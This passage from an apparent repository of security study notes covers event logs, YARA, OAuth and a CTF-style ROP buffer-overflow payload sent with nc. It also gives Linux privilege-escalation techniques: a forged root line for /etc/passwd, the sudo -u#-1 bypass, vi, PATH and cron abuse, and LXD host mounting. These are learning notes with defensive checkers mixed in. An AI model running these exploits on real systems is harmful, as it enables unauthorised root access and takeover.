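    Proc("lsass.exe",    4712, 3120, r"C:\Windows\System32\lsass.exe",    r"DESKTOP\alice"),
]
CLEAN = SAMPLE[:9]   # the same tree without the two anomalies

if __name__ == "__main__":
    for finding in check_snapshot(SAMPLE):
        print(finding)
```

On a live system the same function can be fed from `tasklist /v` or `Get-Process` output once it is parsed into `Proc` records.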
Other instances can be started after boot.
--------------------------------------------------------------------------------
/Day 13 - Event Logs/README.md:
--------------------------------------------------------------------------------
### Windows Event Logs

Main Resource used : https://tryhackme.com/room/windowseventlogs

Event logs record events that happen during the operation of a system. They provide an audit trail that helps you understand the system's activity and find problems.

The OS also writes error messages to these logs by default. This is very useful for blue teamers: correlating logs from multiple sources allows statistical analysis and surfaces events that would not have been found otherwise.

To help with this we can use SIEM tools such as Splunk and Elastic.
Even though we can access a remote machine's logs directly, doing that for every machine is not feasible. That is where SIEM systems come in: they collect logs from all the endpoints, appliances, etc. and let us query logs from multiple devices instead of manually viewing each one.

The log files are not text files viewable in a text editor, but they can be converted to XML through the Windows API. Common extensions: .evt, .evtx
Common location: `C:\Windows\System32\winevt\Logs`

3 main tools :
1. **Event Viewer** (GUI-based application)
2. **Wevtutil.exe** (command-line tool)
3. **Get-WinEvent** (PowerShell cmdlet)

Each has its pros and cons.

##### Event Viewer
To open this tool, right-click the Windows button and click Event Viewer, or run `eventvwr.msc` from cmd.exe.

It has 3 panes:
1. The left one provides a tree listing the event log providers.
2. The middle one displays a general overview and summary of the events specific to the selected provider.
3. The right one is the Actions pane.
There are 5 types of events that can be logged :

**Error**
An event that indicates a significant problem such as loss of data or loss of functionality. For example, if a service fails to load during startup, an Error event is logged.

**Warning**
An event that is not necessarily significant, but may indicate a possible future problem. For example, when disk space is low, a Warning event is logged. If an application can recover from an event without loss of functionality or data, it can generally classify the event as a Warning event.

**Information**
An event that describes the successful operation of an application, driver, or service. For example, when a network driver loads successfully, it may be appropriate to log an Information event. Note that it is generally inappropriate for a desktop application to log an event each time it starts.

**Success Audit**
An event that records an audited security access attempt that is successful. For example, a user's successful attempt to log on to the system is logged as a Success Audit event.

**Failure Audit**
An event that records an audited security access attempt that fails. For example, if a user tries to access a network drive and fails, the attempt is logged as a Failure Audit event.

Source : https://docs.microsoft.com/en-us/windows/win32/eventlog/event-types

In the left pane the standard logs are visible under Windows Logs. Here is a description of each:

**Application**
Contains events logged by applications. For example, a database application might record a file error. The application developer decides which events to record.

**Security**
Contains events such as valid and invalid logon attempts, as well as events related to resource use such as creating, opening, or deleting files or other objects. An administrator can start auditing to record events in the security log.
**System**
Contains events logged by system components, such as the failure of a driver or other system component to load during startup.

**CustomLog**
Contains events logged by applications that create a custom log. Using a custom log enables an application to control the size of the log or attach ACLs for security purposes without affecting other applications.

PowerShell will log operations from the engine, providers, and cmdlets to the Windows event log.
--------------------------------------------------------------------------------
/Day 14 - Yara/README.md:
--------------------------------------------------------------------------------
### YARA
Main Resource Used : https://tryhackme.com/room/yara

###### Introduction

YARA's full form is Yet Another Ridiculous Acronym, and it is considered the pattern-matching Swiss army knife for everyone.

It can identify information based on both binary and text patterns, such as hexadecimal sequences and strings in a file.

To define these patterns we use rules; these rules are often written to determine whether a file is malicious or not.

Strings are a fundamental component of programming languages; applications use strings to store data such as text. We can use YARA to search for those strings in every program running on the OS.

Malware uses strings to store textual data, like IP addresses or bitcoin addresses.

###### Downloading Yara

1. Via apt: `sudo apt install yara`
2. Building from source (install the build dependencies first): `sudo apt install automake libtool make gcc flex bison libssl-dev libjansson-dev libmagic-dev pkg-config`
3. Manually via the GitHub repo: `wget https://github.com/VirusTotal/yara/archive/v4.0.2.tar.gz` and then follow the steps there.
###### Rules in Yara

The rule language in YARA is pretty basic, and rules are written in files with the .yar extension. The strength of a rule is basically determined by the patterns it searches for.
The yara command requires 2 arguments to be valid:
1. The rule file
2. The name of the file, directory, or process ID to apply the rule to.

To make a rule file we can start with

```
rule examplerule {
        condition: true
}
```

The name in this case is examplerule and the condition is `condition: true`. Every rule requires a name and a condition to be valid.

This rule just checks that the file exists; if the file does not exist we get errors. To run these rules we invoke yara like this:

```
yara rule.yar filethattotallyexists
```

A lot of the conditions in YARA are documented here:
https://yara.readthedocs.io/en/stable/writingrules.html

A few of them are:

Meta: This is for descriptive information by the author of the rule. For example, you can use desc to summarise what your rule checks for. It is basically like comments.

Strings: They can be used to search for specific text or hexadecimal in files or programs. If we want to know whether a file contains certain strings, we can use YARA rules for that.

We can define it like this:

```
rule string_checker {
strings:
    $bitcoin_address = "Somerandomaddress"
    $MaliciousIP = "SomeguysIPs"

condition:
    any of them
}
```

This rule will try to find any of these strings in the files/paths we define.

For the conditions we can also use operators such as <=, >=, != etc.
For example, to use these operators with strings (the `#` prefix gives the number of occurrences of a string, whereas `$` only tests for its presence):

```
rule string_checker {
strings:
    $bitcoin_address = "Somerandomaddress"
    $MaliciousIP = "SomeguysIPs"

condition:
    #MaliciousIP <= 10
}
```

So now it will match only if there are 10 or fewer occurrences of the malicious IP. We also have other operators like and, not, or. Example:

```
rule string_checker {
strings:
    $bitcoin_address = "Somerandomaddress"
    $txt_file = ".txt"   // matches the bytes ".txt" anywhere in the content, not the file name

condition:
    $bitcoin_address and $txt_file
}
```

This rule will now only match files that contain both the bitcoin address and the string ".txt" (YARA matches file content, not the file name, so this is only an approximation of "has the .txt extension").

Super handy cheatsheet: https://medium.com/malware-buddy/security-infographics-9c4d3bd891ef#18dd

###### Modules
We can use modules to make YARA rules more technical.
Cuckoo: an automated malware analysis environment; the cuckoo module lets you write rules based on behaviours discovered in its sandbox.

Python PE: This module lets you create rules based on the various sections/elements of the Windows Portable Executable format.

###### Loki
This tool gives us access to many rules without having to build them from scratch.

Quite a lot of other tools can be found here:
https://github.com/InQuest/awesome-yara

Loki is basically a free Indicator of Compromise scanner. It can be used on Windows and Linux systems.

Many times you have to research the latest threats and then use that information to write rules; Loki already ships with a lot of rules that we can benefit from when scanning an endpoint for evil. We use -p to define the path of the files we want Loki to scan.
```
python loki.py -p /path/tocheck
```

###### Thor Lite
This is a newer version of the tool and a multi-platform IOC and YARA scanner. It has scan throttling to avoid exhausting CPU resources.

Some other tools are: Fenrir, YAYA (Yet Another Yara Automation)

###### Creating Yara Rules with yarGen

The main principle is the creation of YARA rules from strings found in malware files while removing all strings that also appear in goodware files. Therefore yarGen includes a big goodware strings and opcode database as ZIP archives that have to be extracted before the first use.
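The `#` count operator and the `any of them` / `and` conditions from the rules in this section, evaluated over constructed file contents. This is an added example, not from the notes and not the yara-python API: `parse_rule` and `evaluate` are a small hand-written evaluator for a subset of the rule syntax (plain text strings only, no hex or regex strings, no modules).

```python
"""Evaluate YARA-style string conditions over bytes.

Added example, not from the notes and not the yara-python API: parse_rule
and evaluate form a small hand-written evaluator for a subset of the rule
syntax ($id, #id, comparisons, and/or/not, any/all of them, text strings)."""
import operator
import re

OPS = {"<": operator.lt, "<=": operator.le, ">": operator.gt,
       ">=": operator.ge, "==": operator.eq, "!=": operator.ne}
TOKEN = re.compile(r"\(|\)|[#$]\w+|\d+|<=|>=|==|!=|<|>|(?:any|all) of them|\w+")


def parse_rule(text):
    """Return (name, {string id: text}, condition) for a rule with text strings only."""
    name = re.search(r"rule\s+(\w+)", text).group(1)
    strings = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]*)"', text))
    cond = re.search(r"condition:\s*(.+?)\s*}\s*$", text, re.S).group(1)
    return name, strings, " ".join(cond.split())


def count_strings(strings, data):
    """#id in YARA is the number of occurrences; text strings are ASCII by
    default, so the same text encoded as UTF-16 would not be counted."""
    return {sid: data.count(s.encode()) for sid, s in strings.items()}


def evaluate(cond, counts):
    """Recursive-descent evaluation with YARA precedence: or < and < not."""
    toks = TOKEN.findall(cond)
    pos = 0

    def take():
        nonlocal pos
        pos += 1
        return toks[pos - 1]

    def peek():
        return toks[pos] if pos < len(toks) else None

    def atom():
        t = take()
        if t == "(":
            value = expr_or()
            take()                      # the closing ")"
            return value
        if t == "not":
            return not atom()
        if t in ("true", "false"):
            return t == "true"
        if t == "any of them":
            return any(c > 0 for c in counts.values())
        if t == "all of them":
            return all(c > 0 for c in counts.values())
        if t.startswith("#"):           # occurrence count
            return counts[t[1:]]
        if t.startswith("$"):           # presence, i.e. count > 0
            return counts[t[1:]] > 0
        if t.isdigit():
            return int(t)
        raise ValueError(f"unsupported token {t!r}")

    def comparison():
        left = atom()
        if peek() in OPS:
            return OPS[take()](left, atom())
        return left

    def expr_and():
        value = comparison()
        while peek() == "and":
            take()
            rhs = comparison()          # always consume the right-hand side
            value = value and rhs
        return value

    def expr_or():
        value = expr_and()
        while peek() == "or":
            take()
            rhs = expr_and()
            value = value or rhs
        return value

    return bool(expr_or())


def scan(rule_text, data):
    """True if the rule matches the given file contents."""
    _, strings, cond = parse_rule(rule_text)
    return evaluate(cond, count_strings(strings, data))


def make_rule(condition):
    """Rule using the strings from the notes plus the given condition."""
    return ('rule string_checker {\nstrings:\n'
            '$bitcoin_address = "Somerandomaddress"\n'
            '$MaliciousIP = "SomeguysIPs"\n'
            '$txt_file = ".txt"\n'
            f'condition:\n{condition}\n}}')

# Gotcha worth knowing: "#MaliciousIP <= 10" on its own is also true for a
# file with zero occurrences; write "$MaliciousIP and #MaliciousIP <= 10"
# when you mean "present, but at most ten times".
```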
--------------------------------------------------------------------------------
/Day 15 - ROP Attacks Basics/README.md:
--------------------------------------------------------------------------------
Main resources used : https://www.youtube.com/watch?v=72GShSHsRZI : Pink Draconian : Hack The Box - Introduction to Binary Exploitation - Reg - Walkthrough

This is an exploitation technique used in buffer overflows, and by malicious outsiders to execute code on target systems.

This attack is mostly used when NX is enabled, which prevents us from executing our own shellcode. Instead we have to analyse the flow of the functions and return into existing functions to our advantage, taking control of functions in the binary to get remote code execution. Ideally we can abuse the libc library for this: it is very well known, and it is possible to identify memory addresses we can call to craft a payload that does not mess up the buffer and executes what we want.
But in many CTFs the binary contains functions we can take over; we analyse them with Ghidra/gdb to get the address we need to redirect our controlled EIP to in order to execute that function.

#### Example : Reg

This is a super simple CTF. The first thing to do here is to analyse the binary in gdb/Ghidra.

If we analyse the binary in Ghidra we see that there are 4 functions: main, run, initialize and winner. After analysing the code we can see that the main function runs the run function, which uses the initialize function to initialize variables and then calls gets, so we can easily overflow that, as gets is vulnerable to buffer overflow attacks.

![](./Images/run.png)

![](./Images/winner.png)

So let's open the file in gdb and find where the EIP is. To do this we can use pattern_create and pattern_search, which are built into gdb-peda, like so:

![](./Images/reg.png)

![](./Images/patternsearch.png)

To confirm that the RIP offset we got is correct we can try overwriting it: I did that by printing 56 "a" and adding 4 "b" to overwrite the RIP, and we were successful.

![](./Images/overwritten.png)

Now let's reload the file in gdb (this helps avoid the extra functions added to the binary after execution) and run `info functions` to see the address of the winner function, which we have to execute to get our shell.
![](./Images/functions.png)

Here we see the address is `0x0000000000401206`, but because of little-endianness we have to reverse the bytes in our payload. You can use libraries like pwntools or struct for it; I just reversed it manually, and our payload would be something like this:

```python
import sys

padding = 56 * b"a"                              # 56 bytes to reach the saved return address
address = b"\x06\x12\x40\x00\x00\x00\x00\x00"    # 0x401206 (winner) in little-endian byte order
payload = padding + address
sys.stdout.buffer.write(payload)                 # write the raw bytes, not print()'s b'...' repr
```

We can now redirect this output to a file and then send it to our netcat session like so:

```bash
python exploit.py > payload.txt
nc remoteip remoteport < payload.txt
```
--------------------------------------------------------------------------------
/Day 16 - OAuth Basics/README.md:
--------------------------------------------------------------------------------
Main Resource Used :
https://portswigger.net/web-security/oauth : Web Security Academy : OAuth Authentication
https://www.youtube.com/watch?v=j-bHvqQ378s : Understanding How OAuth2 Works : Engineer Man

OAuth is basically an authorization framework that lets us access a user's data from another website. Let's say we have our website A and we want people to log in without having to make an account; we can use OAuth and request data from an OAuth provider, say Discord. We can specify the specific data we want from them, and then the user only has to authorize access for our website A to that specific bit of data. So in simpler terms, OAuth allows the user to grant this access without exposing their login credentials to the requesting application.

Many sites use this together with social media websites to let you log in using them. This is super popular now, but it does have a lot of implementation mistakes.

OAuth also allows web developers to request access to certain data to integrate 3rd-party functionality.
It works by defining a series of interactions between 3 distinct parties, namely the client application, the resource owner and the OAuth service provider. There are a lot of different ways this can be implemented as well; the most popular grant types are "authorization code" and "implicit".
The main steps are:
1. The client application requests access to the specified data, after telling the provider which grant type it wants to use.
2. The user is then prompted to give their consent.
3. The client receives a unique access token that proves it has permission to view the user's data.
4. The client application can then use this token to make API calls and fetch the needed data from the resource server.

OAuth Authentication :

This was not the original intent, but it is now very popular for websites to use OAuth to authenticate users.

The basic OAuth flows remain largely the same for this; the main difference is how the client application uses the data it gets. From the user's perspective, OAuth authentication is something similar to SSO.

It is generally used like this:
1. The user chooses the option to log in with the OAuth provider; the client application then uses the OAuth provider to get access to some data it can use to identify the user. This could be an email address, username, etc.
2. The application then uses the access token to fetch that information from the OAuth service provider's API endpoints.
3. Once it has the data, the application uses it in place of a username or email to log the user in, and the access token it received is often used instead of a traditional password.

Vulnerabilities in this arise due to:

1. The data specification in OAuth being vague and flexible.
2. Plenty of opportunities for bad practices to creep in.
3. Lack of built-in security features. It relies mostly on developers, and extra security features need to be implemented on top.
4. Depending on the type of data being transferred, it can be highly sensitive at times and could be intercepted.
--------------------------------------------------------------------------------
/Day 17 - Linux Privelege Escalation/README.md:
--------------------------------------------------------------------------------
Main Resources used : https://tryhackme.com/room/commonlinuxprivesc

Privilege escalation usually involves going from a lower permission level to a higher one.

This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you, or where you attempt to gain higher privileges or access with an existing account that you have already compromised. For local privilege escalation attacks this might mean hijacking an account with administrator or root privileges.

This allows you to do many things, including:

- Reset passwords
- Bypass access controls to compromise protected data
- Edit software config
- Enable persistence, so you can access the machine again later
- Change the privileges of users

The two main sources of information are these:

LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root.
It is important to understand what commands LinEnum executes, so that you are able to manually enumerate privesc vulnerabilities in a situation where you're unable to use LinEnum or a similar script.

LinEnum.sh

https://netsec.ws/?p=309

https://github.com/rebootuser/LinEnum

https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

If a binary runs with high privileges as another account rather than root, you have to run it as that user:

```bash
sudo -u user binaryhecanrunasadmin exploitfrogtfo
```

### Set SUID/SGID Privileges →

This means that the file or files can be run with the permissions of the file's owner/group, in this case the super-user. We can leverage this to get a shell with these privileges!

As we all know, in Linux everything is a file, including directories and devices, and every file has permissions that allow or restrict three operations: read, write and execute. So when you set permissions on any file, you should be aware of which Linux users you allow or restrict for each of the three permissions.
Take a look at the following demonstration of how maximum privileges (rwxrwxrwx) look:

r = read

w = write

x = execute

```
user   group  others
rwx    rwx    rwx
421    421    421
```

The maximum number of bits that can be used to set permissions for each user is 7, which is a combination of read (4), write (2) and execute (1). For example, if you set permissions using **chmod** as **755**, then they will be: rwxr-xr-x.

But when a special permission is given to a user it becomes SUID or SGID. When the extra bit **"4"** is set on the user (owner) it becomes **SUID** (Set User ID), and when the bit **"2"** is set on the group it becomes **SGID** (Set Group ID).

Therefore, the permissions to look for when looking for SUID/SGID files are:

SUID:

rws-rwx-rwx

SGID:

rwx-rws-rwx

```bash
find / -perm -u=s -type f 2>/dev/null
```

We can use the command **"find / -perm -u=s -type f 2>/dev/null"** to search the file system for SUID files (use `-g=s` in the same way for SGID files). Let's break down this command.

**find** - Initiates the "find" command

**/** - Searches the whole file system

**-perm** - Searches for files with specific permissions

**-u=s** - Any of the permission bits _mode_ are set for the file. Symbolic modes are accepted in this form

**-type f** - Only search for files

**2>/dev/null** - Suppresses errors

### Exploiting a Writeable /etc/passwd

The /etc/passwd file stores essential information which is required during login. In other words, it stores user account information. /etc/passwd is a plain text file. It contains a list of the system's accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.
The /etc/passwd file should be generally readable, as many command-line utilities use it to map user IDs to user names. However, write access to /etc/passwd must be limited to the superuser/root account. When it is not, or a user has erroneously been added to a group that is allowed to write to it, we have a vulnerability that allows the creation of a root user that we can access.

The /etc/passwd file contains one entry per line for each user (user account) of the system. All fields are separated by a colon (:). There are seven fields in total, as follows.

Example : test:x:0:0:root:/root:/bin/bash

1. **Username**: Used when the user logs in. It should be between 1 and 32 characters in length.
2. **Password**: An x character indicates that the encrypted password is stored in the /etc/shadow file. Please note that you need to use the passwd command to compute the hash of a password typed at the CLI or to store/update the hash of the password in the /etc/shadow file; in this case the password field only holds an "x".
3. **User ID (UID)**: Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further, UIDs 100-999 are reserved by the system for administrative and system accounts/groups.
4. **Group ID (GID)**: The primary group ID (stored in the /etc/group file).
5. **User ID Info**: The comment field. It allows you to add extra information about the user such as the user's full name, phone number etc. This field is used by the finger command.
6. **Home directory**: The absolute path to the directory the user will be in when they log in. If this directory does not exist then the user's directory becomes /.
7. **Command/shell**: The absolute path of a command or shell (/bin/bash). Typically this is a shell. Please note that it does not have to be a shell.
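A defender's check for the seven-field format just described: parse each entry and flag the traces the writable-/etc/passwd technique leaves behind (a second UID-0 account, a hash stored in the password field, an empty password field on a login shell). This is an added example, not from the notes; the passwd content is constructed, with the notes' own `new:` line included, and the optional `mode` argument (the file's permission bits) is an assumption of this example.

```python
"""Audit /etc/passwd content for the traces the technique described above
leaves behind.  Added example, not from the original notes: the passwd text
below is constructed, and only the notes' "new:" line is taken from them."""
from dataclasses import dataclass

# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


@dataclass
class PasswdEntry:
    username: str
    password: str   # "x" means the hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str      # the "User ID Info" comment field
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd-format text; every non-empty line must have exactly 7 fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        user, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(user, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text, mode=None):
    """Return (finding, username) pairs.  `mode` is the file's permission bits
    (e.g. os.stat(path).st_mode) when available; the technique above needs the
    file to be writable by someone other than root."""
    findings = []
    if mode is not None and mode & 0o022:
        findings.append(("/etc/passwd is group- or world-writable", "-"))
    seen = set()
    for e in parse_passwd(text):
        if e.uid == 0 and e.username != "root":
            findings.append(("uid 0 account other than root", e.username))
        if e.password not in ("x", "*", "!", "!!", ""):
            findings.append(("password hash stored in /etc/passwd", e.username))
        if e.password == "" and e.shell not in NOLOGIN_SHELLS:
            findings.append(("empty password field with a login shell", e.username))
        if e.username in seen:
            findings.append(("duplicate username", e.username))
        seen.add(e.username)
    return findings


# Constructed sample: a normal file plus the notes' "new" root entry and a
# "backup" account with an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
new:$1$1$uDhz6SV7D5d03OFB20h4E//G0:0:0:root:/root:/bin/bash
backup::34:34:backup:/var/backups:/bin/sh
"""

if __name__ == "__main__":
    for finding, user in audit_passwd(SAMPLE_PASSWD, mode=0o666):
        print(f"{user}: {finding}")
```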
Now that we know this, if we have a writable /etc/passwd file we can write a new line entry according to the format above and create a new user. We add the password hash of our choice and set the UID, GID and shell to root's, allowing us to log in as our own root user.

Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command:

```bash
openssl passwd -1 -salt [salt] [password]
```

And now we can edit the /etc/passwd file and either set a new password for root or just add a new user at the bottom like this:

```bash
new:$1$1$uDhz6SV7D5d03OFB20h4E//G0:0:0:root:/root:/bin/bash
```

### Escaping Vi Editor

This exploit comes down to how effective our user account enumeration has been. Every time you have access to an account during a CTF scenario, you should use `sudo -l` to list what commands you're able to use as a super user on that account. Sometimes, like this, you'll find that you're able to run certain commands as a root user without the root password. This can enable you to escalate privileges.

If you find a misconfigured binary during your enumeration, or when you check what binaries a user account you have access to can run, a good place to look up how to exploit them is GTFOBins. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. It provides a really useful breakdown of how to exploit a misconfigured binary and is the first place you should look if you find one on a CTF or pentest.

If we have something like /usr/bin/vi we can abuse it by running `sudo vi`, then typing `:!sh`, and we will get a shell.
https://gtfobins.github.io/

### Exploiting Crontab

The cron daemon is a long-running process that executes commands at specific dates and times. You can use this to schedule activities, either as one-time events or as recurring tasks. You can create a crontab file containing commands and instructions for the cron daemon to execute.

We can use the command `cat /etc/crontab` to view what cron jobs are scheduled. This is something you should always check manually whenever you get a chance, especially if LinEnum, or a similar script, doesn't find anything.

Cron jobs exist in a certain format; being able to read that format is important if you want to exploit a cron job.

\# = ID, m = minute, h = hour, dom = day of the month, mon = month, dow = day of the week, user = what user the command will run as, command = what command should be run

If the autoscript file is owned by root, it will run with root privileges, despite the fact that we can write to this file. The task is then to create a command that returns a shell and paste it into the autoscript file. Then we run `nc -lvp 8888` to get a shell whenever the job runs.

### Exploiting the PATH variable

PATH is an environment variable in Linux and Unix-like operating systems which specifies the directories that hold executable programs. When the user runs any command in the terminal, the shell searches those directories, in PATH order, for a matching executable file.

Let's say we have an SUID binary. Running it, we can see that it's calling the system shell to do a basic task like listing processes with "ps". Unlike in our previous SUID example, in this situation we can't exploit it by supplying an argument for command injection, so what can we do to try and exploit this?
We can rewrite the PATH variable to a location of our choosing! So when the SUID binary calls the system shell to run an executable, it runs one that we've written instead!

As with any SUID file, it will run this command with the same privileges as the owner of the SUID file! If this is root, using this method we can run whatever commands we like as root!

Let's change directory to /tmp. Now that we're inside /tmp, let's create an imitation executable. The format for what we want to do is:

```bash
echo "/bin/bash" > [filewewannaimpersonate]
```

We then make this file executable and then we change the PATH variable like this:

```bash
export PATH=/tmp:$PATH
```

### Sudo Bypass

CVE-2019-14287 is a vulnerability found in the Unix Sudo program by a researcher working for Apple, Joe Vennix. Coincidentally, he also found the vulnerability that we'll be covering in the next room of this series. This exploit has since been fixed, but may still be present in older versions of Sudo (versions < 1.8.28), so it's well worth keeping an eye out for!

The vulnerability we're interested in for this task occurs in a very particular scenario. Say you have a user who you want to grant extra permissions to. You want to let this user execute a program as if they were any other user, but you don't want to let them execute it as root. You might add this line to the sudoers file:

```bash
ALL=(ALL:!root) NOPASSWD: ALL
```

This would let your user execute any command as another user, but would (theoretically) prevent them from executing the command as the superuser/admin/root. In other words, you can pretend to be any user except the admin.

In practice, with vulnerable versions of Sudo you can get around this restriction to execute the programs as root anyway, which is obviously great for privilege escalation!

With the above configuration, using `sudo -u#0` (the UID of root is always 0) would not work, as we're not allowed to execute commands as root. If we try to execute commands as user 0 we will be given an error. Enter CVE-2019-14287.

Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent, 4294967295), Sudo would incorrectly treat this as 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so. It is worth noting that this will only work if you've been granted non-root sudo permissions for the command, as in the configuration above.

Practically, the application of this is as follows:

```bash
sudo -u#-1
```

If you have `(ALL : ALL) NOPASSWD: ALL`, just do `sudo su` to gain root and gg.

### Netstat -tulpn

Run this to check which ports are listening locally and try to connect to them using telnet.
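Two things are worth checking on a host for the CVE-2019-14287 scenario above: whether the installed Sudo predates the 1.8.28 fix, and whether any sudoers rule relies on a runas blacklist (`ALL` with `!root`), since a deny-list runas spec is the configuration the bug bypassed and is fragile even on patched versions. This added example (not from the original notes) implements both checks over constructed `sudo --version` output and a constructed sudoers fragment.

```python
"""Version and sudoers checks for the CVE-2019-14287 scenario.
Added example, not from the original notes; sample inputs are constructed."""
import re

FIXED_IN = (1, 8, 28)  # first Sudo release with the fix, as stated in the text


def parse_sudo_version(banner):
    """Extract (major, minor, patch) from 'sudo --version' output.
    A 'p1'-style suffix is a patch level of the same release and is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no Sudo version found in banner")
    return tuple(int(x) for x in m.groups())


def version_affected(banner):
    """True when the reported version is older than the fixed release."""
    return parse_sudo_version(banner) < FIXED_IN


RUNAS_RE = re.compile(r"\(([^)]*)\)")  # the (runas_users[:runas_groups]) part


def runas_excludes_root(sudoers_line):
    """True if the runas spec is an allow-all with a '!root' exclusion.
    Accepts both the '(ALL, !root)' form from the advisory and the
    '(ALL:!root)' form written in the notes above."""
    m = RUNAS_RE.search(sudoers_line)
    if not m:
        return False
    tokens = [t.strip() for t in re.split(r"[,:]", m.group(1))]
    return "ALL" in tokens and "!root" in tokens


def audit_sudoers(text):
    """Return the rule lines that use the blacklist-style runas spec."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")
            and runas_excludes_root(ln)]


# Constructed samples
SAMPLE_BANNER = "Sudo version 1.8.27\nSudoers policy plugin version 1.8.27\n"
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
alice   ALL=(ALL:!root) NOPASSWD: ALL
bob     ALL=(www-data) /usr/bin/vi
"""

if __name__ == "__main__":
    print("version affected:", version_affected(SAMPLE_BANNER))
    for rule in audit_sudoers(SAMPLE_SUDOERS):
        print("blacklist runas rule:", rule)
```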
[https://www.hackingarticles.in/penetration-testing-on-memcached-server/](https://www.hackingarticles.in/penetration-testing-on-memcached-server/)

### Linking to a folder getting chmod'ed

Sometimes there is a cron job that looks something like this:

![Cron job running chmod on a directory](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e1dd9514-5c93-41ab-aab8-cd27e33b6682/Untitled.png)

To exploit this, if we have write permission to the directory we can make a link to the root folder like so:

```bash
ln -s /root ./tmp
```

### LXD Exploitation

On the attacker machine:

```bash
git clone
cd lxd-alpine-builder
./build-alpine
```

Then transfer the built image over to the target machine; you can use nc, `python3 -m http.server` or `python -m SimpleHTTPServer` for this.

Then go to the folder where you downloaded this alpine image:

```bash
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
```

You are now importing the image as myimage.

```bash
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
cd /mnt/root/root
ls
```
--------------------------------------------------------------------------------
/Day 2 - More about Stacks and Linux BOF/Images/ghex.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 2 - More about Stacks and Linux BOF/Images/ghex.png
--------------------------------------------------------------------------------
/Day 2 - More about Stacks and Linux BOF/Images/intialize.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 2 - More about Stacks and Linux BOF/Images/intialize.png
--------------------------------------------------------------------------------
/Day 2 - More about Stacks and Linux BOF/Images/main.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 2 - More about Stacks and Linux BOF/Images/main.png
--------------------------------------------------------------------------------
/Day 2 - More about Stacks and Linux BOF/README.md:
--------------------------------------------------------------------------------
### Introduction to the Stack

This is the area of memory within a process which the process itself uses to save data. Contrary to registers, which are small in size, the stack offers us a lot of space. It also helps to track the execution of the program.
When a new function is called, the last address before the function call is stored on the stack so the program knows where execution stopped.

This is the return address, as this is where the program has to return to. The stack is 4-byte aligned (32-bit) and it grows towards lower addresses. The stack starts at a high address and grows down to lower memory addresses as values are added; the Base Pointer points to the beginning (base) of the stack, in contrast to the Stack Pointer, which points to the top of the stack.

If no protections are in place we just operate on the stack as a normal piece of memory, and if we can overwrite it due to programming errors we can cause an overflow. This mostly happens in C/C++, where you have to predefine the size of a variable many times.

We can use gdb to analyze these attacks, the stack and the values of the registers when such attacks happen, and to disassemble functions to get an idea of what they are doing.

```bash
gdb -q ./files
disas main # analyze the main function and see which other functions are called and what they do
```

Basically we first try to find vulnerable points and then send a lot of characters to overwrite EIP (which is what controls the execution flow of the program); if we can do that then we are good to go.

To get the exact offset at which EIP is overwritten we can use pattern_create and pattern_offset to create a pattern and look up the position of the value that landed in EIP.
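How pattern_create and pattern_offset actually work, as an added example that is not peda's code: build a byte sequence in which every 4-byte window is unique, send it as input, then look up where the 4 bytes that landed in EIP sit in the sequence. This version uses a De Bruijn sequence (the approach pwntools' `cyclic()` takes) rather than peda's own alphabet scheme, so its bytes differ from peda's output but the offsets are found the same way.

```python
"""Cyclic pattern generation and offset lookup, the idea behind
pattern_create / pattern_offset. Added example, not peda's or pwntools' code."""


def de_bruijn(alphabet, n):
    """Yield the De Bruijn sequence B(k, n) over `alphabet` (bytes): every
    length-n window occurs exactly once. Standard FKM recursive algorithm."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern_create(length, n=4):
    """Return `length` bytes in which every n-byte window is unique
    (26 lowercase letters give 26**4 unique 4-byte windows, far more than
    any realistic buffer)."""
    gen = de_bruijn(b"abcdefghijklmnopqrstuvwxyz", n)
    return bytes(next(gen) for _ in range(length))


def pattern_offset(value, length=1000, n=4):
    """Offset of an n-byte window in the pattern, or -1 if absent.
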